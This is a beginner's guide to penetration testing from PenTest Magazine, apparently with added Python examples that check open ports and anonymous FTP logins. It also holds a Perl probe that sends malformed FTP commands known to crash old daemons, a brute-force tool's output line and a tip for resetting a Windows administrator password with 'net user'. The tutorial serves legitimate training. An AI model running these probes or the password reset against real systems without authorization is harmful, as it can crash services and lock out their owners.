
PenTest Magazine: Pivotal Basics for Every Beginner

PenTest Magazine, StartKit 03/2013(03), page 6, http://pentestmag.com

FOR REAL BEGINNERS

I believe that penetration testing, like any other internet security field, is more a frame of mind than anything else: thinking outside the box. When a person asks what I do for a living and I tell them I am a pentester, their response is always the same: "What is that, and how can I get that title?" I have the same answer every time. A penetration test is a chess match, played between the pentester and the contracting organization's IT department. You start out as a pawn and end up as a queen, and that queen must be able to deliver checkmate in the organization's network infrastructure.

There are three different groups of educated pentesters. There are the self-educated, which includes people like gamers and those who are simply curious about how to hack a network. Then you have the college educated, who decided to go to school and learn how a network operates and how to secure it. Lastly, you have the third category, which combines the first two. None is better than the others, because to become a well-known pentester you must be educated in networking, have certifications to prove you can go the extra mile, and be up to date with the latest technologies.

Types of Pentesters
A pentester is considered an ethical hacker because there has to be a level of trust between the hiring organization and the tester. When I tell people I am a pentester, I usually follow by explaining that I am an ethical hacker. It is confusing because these two roles can seem to conflict with one another. Before becoming a pentester, you have to decide which group of hackers you want to fall under: white hat, grey hat, black hat, or script kiddie. The term "hacker" has not always had the negative connotations that it has today. A hacker originally described a person with a desire to learn about and experiment with technology, and referred to someone who was technically proficient with whatever systems they hacked. The group under which you portray yourself will determine whether you should pursue a career as a pentester.

White hats may be security professionals hired by companies to audit network security or test software. Having access to the same software tools that other hackers use, a white hat seeks to improve the security of a network by attacking a network or application as a black hat hacker would. A black hat hacker is a person who attempts to find network and application security vulnerabilities and exploit them for personal financial gain or other malicious reasons. This differs from white hat hackers, who are security specialists employed to use hacking methods to find the security flaws that black hat hackers may exploit.

Pivotal Basics for Every Beginner

Is being a pentester your dream job? Would you like to do pentesting every day for the rest of your life, but you do not know what to start with? In this article I will describe all you need to begin the journey.


Black hat hackers can inflict major damage on both individual computer users and large organizations by stealing financial information, compromising the security of systems, taking a network down, or changing the function of websites and networks.

A grey hat is willing to go to the extremes of both black and white hat hackers. Grey hats typically act to prove a point, often one that white hats would agree with. A person's grey "principles" are the very thing that sets them apart from the other classes of hacker. In most situations they may not disclose their activities, because of the legal consequences. It is not out of the question for a grey hat to hack for personal gain, although it is also not unheard of for them to compromise whole systems for the perceived "greater good".

A script kiddie is a derogatory term for non-serious hackers who are believed to reject the ethical principles held by professional hackers: the pursuit of knowledge, respect for skills, and a motive of self-education. Script kiddies shortcut most hacking methods in order to gain their skills quickly. They will use resources such as YouTube, watch a video of an actual attack performed by a genuine hacker, and then try to replicate it. They attempt to attack and crack computer networks and vandalize websites. Although they are considered inexperienced and undeveloped, script kiddies can do as much damage as skilled hackers.

The majority of pentesters fall under the white hat, grey hat, and script kiddie groups. You really cannot be a black hat and a pentester, because that would mean you deliberately destroy a network when you perform a pentest. In this industry you will not last long with that mentality.

Yes, I put some pentesters in the script kiddie group. Over the years I have looked over other companies' pentest reports, and it baffles me how some organizations pass off their reports as serious pentest reports when they are more like a vulnerability assessment. I have seen instances where a company ran a vulnerability scanner and turned those results in as a pentest report. In other cases I have seen reports delivered by an organization that only ran Metasploit (an exploitation framework that packages ready-made exploits and payloads). The problem with these situations is that, first, these are not examples of penetration tests but rather vulnerability assessments. Second, we lose our skills as IT security professionals if we rely solely on GUI tools. The only thing you learn from that experience is how to use a GUI and how to hit the start button. To me, this is a huge problem. I believe that in order to be a well-known pentester, you need to know what is going on behind the scenes of that vulnerability scanner and those exploits. Ask yourself: what is it actually scanning? When I begin a pentest, there is a lot I need to prepare before I even start scanning.

Penetration Testing vs Vulnerability Assessment

Vulnerability Assessment:

• Typically general in scope, and includes an assessment of the network or a web application,
• A scan that identifies known network, operating system, web application, and web server vulnerabilities using GUI tools, with very minimal exploiting, if any,
• Unreliable at times, with a high rate of false positives.

Penetration Testing:

• Focused in scope, and may include targeted attempts to exploit specific vectors,
• Far more accurate and reliable, because each finding is confirmed by hand,
• Penetration Testing = vulnerabilities that have been exploited and confirmed.

It is impossible to say that a Vulnerability Assessment is a better choice than a Penetration Test. Both Vulnerability Assessments and Penetration Tests are a necessity for an organization's network security. I suggest, at a minimum, that you run a vulnerability assessment at least every three months and a full-blown Penetration Test once a year. By doing this, you keep hardening your network against attackers.

Testing Phases
Though the methodology used by a pentester may change depending on individual preferences, the client contract, or employer principles, for the most part all methodologies include the same stages.

Planning and Scoping
The planning and scoping stage occurs when your organization and the client decide what is within the scope and what needs to be excluded from the test. As a pentester, you must be aware of any potential risks associated with the pentest. Before you start the penetration test, always get a "get out of jail free card": a signed document from the organization and yourself. This document should include the scope of the test: the URLs and the external and internal IP addresses to be tested. It also needs some wording that covers what happens if the network goes down, or if scanning causes severe bandwidth problems that interrupt the organization's everyday business continuity, and it should state that the organization has everything backed up and will not pursue you legally for testing activity carried out within the agreed scope. A named point of contact on the client side and an agreed testing window belong in the same document.

Here is an example of a scope agreed between yourself and the client:

The scope encompassed the internal and external network infrastructure, which included routers, servers, and firewalls hosted in the organization's Cincinnati, Ohio office. The network penetration test was performed from the organization's network in the Cincinnati, Ohio office.

Information gathering
In this phase, the penetration tester accumulates as much information as possible that will assist with the test. This includes public records, email addresses within the organization, and the organization's web presence. In the initial stage, web search engines are used to gather as much information about the target organization as possible, including target machines on the network. The next step is to find live hosts on the network, which can be achieved with discovery tools such as Nmap. After gathering a list of machines on the network and their open ports, we have to verify that the ports are actually open. The reason is that scan results can be wrong, especially for UDP ports: a UDP port that never answers may be open or filtered, and a firewall may be answering on the host's behalf, so a port only counts as open once you have completed a connection to it or received a valid reply from the service behind it. For example, we identified a machine with a lot of ports open and the IP address 10.5.1.1. Let's do a little reconnaissance on that target.
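To make the port-verification step concrete, here is a small Python check added to this edition of the article; it is not the author's code. It repeats the TCP connect that Nmap's -sT scan performs, classifies each port by how the host answered, and notes why UDP results cannot be confirmed the same way. Since 10.5.1.1 is not reachable here, the script stands up its own listener on 127.0.0.1 as a constructed stand-in for the scanned host, and picks an unused local port to play the closed one.

```python
"""Verify that ports a scanner reported as open really accept connections.

Added example, not code from the PenTest Magazine article. It performs a TCP
connect check (what `nmap -sT` does) and classifies each port as "open"
(handshake completed), "closed" (RST received) or "filtered" (no answer
before the timeout). UDP cannot be verified this way: a silent UDP port may
be open or filtered, so UDP findings need a protocol-specific probe, which
this example does not cover.

The target is a listener started on 127.0.0.1 inside the script (a constructed
stand-in for the article's 10.5.1.1), so the example runs offline.
"""
import socket
import threading


def check_tcp_port(host, port, timeout=1.0):
    """Return "open", "closed" or "filtered" for a single TCP port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"            # three-way handshake completed
    except ConnectionRefusedError:
        return "closed"          # host answered with RST: nothing listening
    except socket.timeout:
        return "filtered"        # no SYN/ACK and no RST: dropped on the way
    except OSError:
        return "filtered"        # unreachable or other network error
    finally:
        sock.close()


def verify_ports(host, ports, timeout=1.0):
    """Map each port to its verified state; keep only the "open" ones for the report."""
    return {port: check_tcp_port(host, port, timeout) for port in ports}


def start_local_listener():
    """Constructed target: a TCP listener on an ephemeral 127.0.0.1 port.

    Returns (port, close_fn). Connections are accepted in a thread and dropped,
    which is all the connect check needs to report "open".
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                break            # listener closed: stop serving
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, srv.close


def find_closed_port():
    """Pick a 127.0.0.1 port nothing listens on: bind to 0, read it back, release it."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def demo():
    """Verify one open and one closed port; returns (results, open_port, closed_port)."""
    open_port, close_listener = start_local_listener()
    closed_port = find_closed_port()
    try:
        results = verify_ports("127.0.0.1", [open_port, closed_port])
    finally:
        close_listener()
    return results, open_port, closed_port


if __name__ == "__main__":
    results, open_port, closed_port = demo()
    for port, state in sorted(results.items()):
        print(f"127.0.0.1:{port} {state}")
```

Run it as a script to see one open and one closed port, or point verify_ports at a real host and the port list from a scan to re-check the findings. A "filtered" result is the one to treat with suspicion: it means no answer at all, which for TCP usually means a firewall in the path, and for UDP is exactly the ambiguity the text warns about.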

Reconnaissance
In this stage, the penetration tester starts to assess all of the options available within the scope of the penetration test. The pentester decides what tools are to be used and the method of the pentest itself. This will include methods such as network scanning, enumeration, and code injection. The goal of reconnaissance is to classify vulnerabilities that the tester will then attempt to exploit in the next phase. There are many vulnerability scanners out there, so which one should I use? Personally, I use several, to make sure that there are as few false positives as possible on the vulnerability report itself. As a penetration tester, you have to be resourceful and use what is available. For this test let's use a vulnerability scanner within Kali. You are probably also wondering why you would use a vulnerability scanner when such a tool creates a lot of noise on the network. It is very simple. The job of a penetration tester is to be as thorough as possible, uncovering as many holes as they can find. It is always the penetration tester's job to verify each vulnerability found before marking it as a positive result, and to remove all the false positives. There are hundreds of pages of information in the scan report; I would suggest looking at all of the results. For this case, the one that I am interested in is the vulnerability marked as high, so I am going to click on it and see what it says. The scan of 10.5.1.1 found that the FTP service accepts the 'anonymous' login.

Here is an example of a vulnerability that could be exploited, found as a result of the vulnerability scanner:

Anonymous FTP
Synopsis: Disable anonymous FTP access if it is not needed. Anonymous FTP access can lead to an attacker gaining information about your system that can possibly lead to them gaining access to your system.
Exploitable
Risk Factor: Medium (CVSS 7.1)
Host: 10.5.1.1

Note that the scanner's own label ("Medium") and the CVSS base score it prints (7.1, which the CVSS scale rates as High) disagree. Carry both into the report and say which scale your risk rating follows, rather than copying the scanner's word.

Exploitation
Exploitation is the art of taking advantage of the vulnerabilities discovered in the scanning phase. The idea is to gain access to the systems as an attacker would. For web applications this may include SQL injection, missing input validation, cross-site scripting, and broken authentication and session management. We will be using the username list that we grabbed during the vulnerability assessment phase (I created a file named anonymous.doc containing the single name "anonymous") and a copy of one of the wordlists that ships with Kali. We will also run the Perl script (the "SSH module" of Listing 1), since we already know that the anonymous account is enabled for FTP. Let's look up the CVE number and search Google. CVE-1999-0527 is the CVE number that I found using Google. So, to make sure this isn't a false positive, let's re-check whether the anonymous credential is actually accepted.

[22][ssh] host: 10.5.1.1   login: anonymous   password: anonymous

Read that line carefully before writing it up. It is in the format printed by a login brute-forcing tool such as THC Hydra, and the [22][ssh] prefix means the credential was accepted on port 22 (SSH), not on the FTP service on port 21 that the scanner flagged. A confirmed finding must name the exact host, port and protocol that accepted the login; a re-test against a different service proves nothing about the original finding.
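The re-check described above, as an added Python example that is not the article's code or output: it logs in to the FTP service with the standard library's ftplib and returns the server's reply line, so the evidence in the report is the 230 or 530 the daemon actually sent rather than the scanner's label. Because 10.5.1.1 is not reachable here, the script includes a constructed minimal FTP server on 127.0.0.1 that answers USER, PASS and QUIT only; its allow_anonymous switch lets you see both the confirmed finding and the false-positive case. The host, port and password used are assumptions for the demonstration.

```python
"""Confirm a scanner's "Anonymous FTP" finding against the FTP service itself.

Added example, not code from the PenTest Magazine article. Log in to the
flagged host on port 21 with ftplib and keep the server's literal reply:
a 230 confirms the finding, a 530 makes it a false positive, and a credential
accepted by some other service (such as SSH on port 22) confirms nothing.

To run offline, the target is a constructed minimal FTP server on 127.0.0.1
that understands only USER, PASS and QUIT; whether it allows the anonymous
login is a parameter, so both outcomes can be exercised.
"""
import ftplib
import socket
import threading


def confirm_anonymous_ftp(host, port=21, password="anonymous@example.com", timeout=3.0):
    """Try an anonymous login; return (accepted, reply_line).

    reply_line is what the daemon actually said (e.g. "230 Login successful."),
    which is the evidence that belongs in the report alongside a screenshot.
    """
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        reply = ftp.login("anonymous", password)  # raises error_perm on a 530
        return True, reply
    except ftplib.error_perm as exc:
        return False, str(exc)
    finally:
        if ftp.sock is not None:                  # only if the connect succeeded
            try:
                ftp.quit()
            except (OSError, EOFError, ftplib.Error):
                ftp.close()


class FakeFtpServer:
    """Constructed stand-in for the scanned host (the article's 10.5.1.1)."""

    def __init__(self, allow_anonymous):
        self.allow_anonymous = allow_anonymous
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srv.bind(("127.0.0.1", 0))          # ephemeral port, read back below
        self.srv.listen(5)
        self.port = self.srv.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.srv.accept()
            except OSError:
                break                             # listener closed: stop serving
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        """Speak just enough FTP for a login attempt: 220, 331, 230/530, 221."""
        user = None
        rfile = conn.makefile("rb")
        conn.sendall(b"220 constructed ftpd ready\r\n")
        for raw in rfile:
            verb, _, arg = raw.decode("ascii", "replace").rstrip("\r\n").partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user = arg
                conn.sendall(b"331 Please specify the password.\r\n")
            elif verb == "PASS":
                if user == "anonymous" and self.allow_anonymous:
                    conn.sendall(b"230 Login successful.\r\n")
                else:
                    conn.sendall(b"530 Login incorrect.\r\n")
            elif verb == "QUIT":
                conn.sendall(b"221 Goodbye.\r\n")
                break
            else:
                conn.sendall(b"502 Command not implemented.\r\n")
        rfile.close()
        conn.close()

    def close(self):
        self.srv.close()


def demo():
    """Check one host that allows anonymous FTP and one that refuses it."""
    results = {}
    for label, allow in (("allows-anonymous", True), ("refuses-anonymous", False)):
        server = FakeFtpServer(allow_anonymous=allow)
        try:
            results[label] = confirm_anonymous_ftp("127.0.0.1", server.port)
        finally:
            server.close()
    return results


if __name__ == "__main__":
    for label, (accepted, reply) in demo().items():
        print(f"{label}: {'CONFIRMED' if accepted else 'false positive'} ({reply})")
```

Against a real target, call confirm_anonymous_ftp with the scanned host and port 21; if it returns True, the next evidence to collect is what the anonymous account can see or write, since that is what turns "login accepted" into the information disclosure the scanner's synopsis describes.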

Privilege escalation
Exploiting a system often results in access with only rudimentary privileges. Privilege escalation is the process of gaining further access and additional permissions. Learning to exploit manually, rather than letting a GUI tool do the exploit for you, is a key step to becoming a well-known penetration tester. Automated tools can eat a network's bandwidth or take the network down, and causing that will give you a bad reputation. When you press start on a GUI scanner with its default settings, it may also run checks it did not need to, including denial-of-service checks, which your client will not welcome; know what the tool is configured to do before you launch it. It takes a lot of time and practice to gain privileges on systems through manual exploitation, but it is well worth it. Although exploiting a system results in access, in many instances that access is limited to an account with only rudimentary permissions.

Privilege escalation is the process of using further techniques or exploits to gain further permissions. The more permission gained, the more likely a tester is to reach further systems and confidential data.

For this we will run the Perl script in Listing 1 (the "SSH module" referred to above; despite the name, it speaks FTP over a raw TCP socket). As you can see, we successfully exploited the FTP account. So you have your results from the vulnerability scanner(s) and have completed a few exploits. Now you have to present the vulnerabilities and exploits to the organization. This is done by writing a complete report. Remember to take screenshots of the exploits so that you have proof of the exploit being completed. This will show the organization that you truly know what you are doing as a pentester, and you will be on your way to becoming a well-known penetration tester.

Listing 1. FTP probe script in Perl (the "SSH module" referred to in the text)

#!/usr/bin/perl
# Anonymous-FTP probe: log in as "anonymous" and send three malformed
# requests (an over-long CWD argument, and NLST/SIZE with a "/.../" glob
# path) that old FTP daemons mishandled. Usage: perl ftpprobe.pl <host> <port>
use strict;
use warnings;
use IO::Socket::INET;

my ($host, $port) = @ARGV;
die "usage: $0 <host> <port>\n" unless defined $host and defined $port;

# Anonymous FTP conventionally takes an e-mail address as the password. The
# value in the printed listing was lost in extraction, so a placeholder is
# used here; any e-mail-shaped string will do.
my $user  = "USER anonymous\r\n";
my $passw = "PASS anonymous\@example.com\r\n";

# Each probe opens a fresh connection, logs in, sends one command and prints
# the server's reply, so you can see whether the daemon survived it.
sub probe {
    my ($command, $payload) = @_;
    my $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => $port,
    ) or die "connect to $host:$port failed: $!\n";

    my $serverdata;
    $socket->recv($serverdata, 1024);   # 220 banner
    print $serverdata;
    $socket->send($user);
    $socket->recv($serverdata, 1024);   # 331 password required
    $socket->send($passw);
    $socket->recv($serverdata, 1024);   # 230 logged in, or 530 refused
    print $serverdata;
    $socket->send($command . $payload . "\r\n");
    $socket->recv($serverdata, 1024);   # reply to the probe itself
    print "$command=> $serverdata";
    close $socket;
}

probe("CWD ",  "." x 250);                 # over-long argument
probe("NLST ", "/.../.../.../.../.../");   # glob-expansion path
probe("SIZE ", "/.../.../.../.../.../");

Reporting
This section provides the contracting organization with a summary of the results from the vulnerability scanner and the exploits that were accomplished during the pentest. The report is broken down into two major sections in order to communicate the objectives, methods, and results of the testing to an executive level and to the IT staff:

• The Executive Summary, which would include: an executive summary of the penetration test, the scope, a background section explaining the overall posture of the organization, and a recommendation summary.
• The Technical Report, which would be organized for the IT staff so that they can review and fix the vulnerabilities. This part of the report should include Information Gathering, Vulnerability Assessment, Exploitation/Vulnerability Confirmation, and the risk of the vulnerabilities to the organization.

Certifications
Why get certifications? Some of the best hackers do not have certifications, so why should I get them? You do so because you want to become a well-known penetration tester and not just a hacker. To do this, you need to show that your skills are up to date and that you are willing to put in the time to show your employer that you have the skills to do a penetration test. You are also impressing on your employer that you are a valued member of the team and that you are willing to learn. There are many certifications to choose from. A few that stand out are: Certified Penetration Testing Engineer (C)PTE, Certified Penetration Testing Consultant (C)PTC, GIAC Penetration Tester (GPEN), Certified Ethical Hacker (CEH) and Offensive Security Certified Professional (OSCP). It seems everyone has their own preference about which one is better than the others.

Summary
The process of becoming a well-known penetration tester is not going to happen overnight. Being a pentester is my dream job when it comes to IT security. Taking this journey and becoming a well-known penetration tester involves the pursuit of knowledge, whether it is self-taught or through formal education. It is essential to become acquainted with network basics, particularly the OSI model, TCP/IP, handshakes, the different types of packets, and what's contained in the headers.

I also suggest getting an understanding of network scanners and web application scanners. There are plenty of organizations out there that have white papers and tutorials regarding networks and web applications (OWASP, SANS, and NIST). Find practice labs so that you can get practice hacking networks.

With all this documentation and assistance it is quite simple to become a pentester, but to be a well-known pentester you must not be limited to one technology. You virtually need to know everything when it comes to servers, networks, and vulnerabilities that can be exploited. You need to ensure that you have a thorough understanding of security. Associate yourself with experienced pentesters and join forums and communities that are willing to extend a helping hand. I was once told that the hacking community, in general, is willing to help "newbies" into the hacking community. In general that is a true statement.

To be a successful and well-known hacker you will need to understand and be able to write your own scripts and understand programming languages. While you are on your way to learning about programming, the main question to ask is which language to learn. This debate has gone on for years and there really is no correct answer. Each organization, for the most part, uses one or two languages for their programming so that they can master the language and hire skilled programmers to keep the organization running. As a pentester you should know multiple languages to some degree and understand each one. Python is a good language to start with because it is efficiently designed, well documented in forums, and moderately kind to beginners. If you get into serious programming, you will have to learn C, the core language of Unix, which a pentester should learn or at least have knowledge of. Perl is worth learning for everyday reasons; it is widely used for web pages and system administration, so even if you never write Perl, you should learn to read it.

Also, as a penetration tester you must stay up to date on coding, vulnerabilities, and updates to a network. The organization that hired you will expect you to be current in all subjects related to IT security. There is a saying, "patch Tuesday, hack Friday", which basically means that when Microsoft patches come out on Tuesday, the bugs they fix are being found by diffing the patches and exploited by Friday. Remember there are brontobytes of information floating around the web. My suggestion is to join forums and hacking organizations, and read white papers from reliable sources, to stay on top of the new technology out there.

In conclusion, not everyone will want to become a penetration tester or even know what one is, but within the professional community there are some key steps to becoming well-known and respected. You must commit to continuing education, not be afraid to ask for help, and practice and develop your skills.

Bonus
Here is some information which is useful but did not fit into the article well.

Key knowledge

• A penetration test is not a vulnerability scan, and a vulnerability scan is not a penetration test,
• Learn everything you can about operating systems and servers, not just one flavor,
• Understand the true concepts of TCP/IP, subnets, and coding in as many languages as possible,
• Remember you will not know everything IT related; Google is your best friend.

Tip
Here is a tip that an old school hacker sent me at one point in time. It works about 60 percent of the time, depending on the operating system and so on. As with all exploits, the same percentage applies because you are not going to exploit and get root permissions every time you do a pentest, due to time restraints within the scope.

If you want to take over a computer's Administrator account while logged in with some other account, here are the steps:

• Go to the Start button and click on Run
• Type CMD and press Enter
• A command window will open
• Type net users
• This will show you all the users of that computer
• Now type net user administrator * and press Enter
• This will ask you to enter a password
• Enter the password you want to keep for the administrator
• Re-enter your password to confirm it
• DONE

Two caveats before you try this on an engagement. First, net user only changes another account's password when the account you are logged in with already holds administrator rights (and, on Windows Vista and later, when the command prompt was started elevated); from a standard user account it fails with "System error 5 has occurred. Access is denied." Second, resetting the password locks the real administrator out and cannot be undone without their cooperation, so it is a destructive change that belongs in the scope document before it is ever typed in.

CHRIS BERBERICH
Chris Berberich is a Penetration Tester/Senior Auditor at A-lign Security and Compliance Services based in Tampa, Florida. Chris has an extremely deep and solid understanding of application, server, and network security. Chris' focus as a penetration tester was managing corporate Internet infrastructure, systems, and network security, specifically operating systems, web application servers, databases, interfacing, and data privacy. Certifications: (C)PEH, (C)PTE. [email protected].
